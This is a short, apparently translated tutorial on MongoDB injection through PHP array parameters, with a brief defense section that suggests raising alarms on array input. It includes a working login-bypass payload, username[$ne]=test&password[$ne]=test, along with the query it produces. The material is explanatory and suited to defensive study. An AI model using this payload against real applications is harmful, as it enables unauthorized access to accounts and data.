1. Array injection
The attack at this time takes advantage of a feature of PHP that can pass array parameters.
When the incoming url is: http://127.0.0.1/2.php?username=test&password=test
Statement executed:
db.test.find({username:'test',password:'test'});
If the incoming url is as follows:
http://127.0.0.1/2.php?username[xx]=test&password=test
Then $username is an array, which is equivalent to executing the php statement:
$data = array(
'username'=>array('xx'=>'test'),
'password'=>'test');
http://127.0.0.1/2.php?username[$ne]=test&password[$ne]=test
db.test.find({username:{'$ne':'test'},password:{'$ne':'test'}});
defense
1. Under normal circumstances, there will be no mongodb injection. If an array is passed in as a parameter during inspection, an alarm will be issued.
2. If there is a comment in the mongo statement, it will alarm